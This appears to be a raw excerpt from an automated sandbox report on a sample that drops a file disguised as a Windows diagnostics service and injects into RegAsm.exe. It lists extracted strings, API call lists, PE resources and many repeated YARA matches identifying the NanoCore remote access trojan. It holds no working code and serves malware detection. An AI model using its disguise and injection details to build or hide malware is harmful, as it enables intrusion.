        Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00424021: CreateFileW,DeviceIoControl,CloseHandle, | 2_2_00424021
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00418858 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 2_2_00418858
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_0042545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, | 2_2_0042545F
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003E33C7 | 2_2_003E33C7
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003CFE40 | 2_2_003CFE40
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003E2405 | 2_2_003E2405
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003D44B6 | 2_2_003D44B6
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00440665 | 2_2_00440665
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003F267E | 2_2_003F267E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003E283A | 2_2_003E283A
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003D6843 | 2_2_003D6843
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003F89DF | 2_2_003F89DF
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00440AE2 | 2_2_00440AE2
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003F6A94 | 2_2_003F6A94
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00428B13 | 2_2_00428B13
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003ECD61 | 2_2_003ECD61
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003F7006 | 2_2_003F7006
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003D710E | 2_2_003D710E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003D3190 | 2_2_003D3190
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003C1287 | 2_2_003C1287
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003EF419 | 2_2_003EF419
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003E16C4 | 2_2_003E16C4
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003E1BB8 | 2_2_003E1BB8
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003F9D05 | 2_2_003F9D05
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003EBFE6 | 2_2_003EBFE6
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003E1FD0 | 2_2_003E1FD0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 3_2_02FA2FA8 | 3_2_02FA2FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 3_2_02FA23A0 | 3_2_02FA23A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 3_2_02FA3850 | 3_2_02FA3850
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 3_2_02FA306F | 3_2_02FA306F
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: String function: 003C7F41 appears 35 times
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: String function: 003E8B40 appears 42 times
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: String function: 003E0D27 appears 70 times
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: sfc.dll
        Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
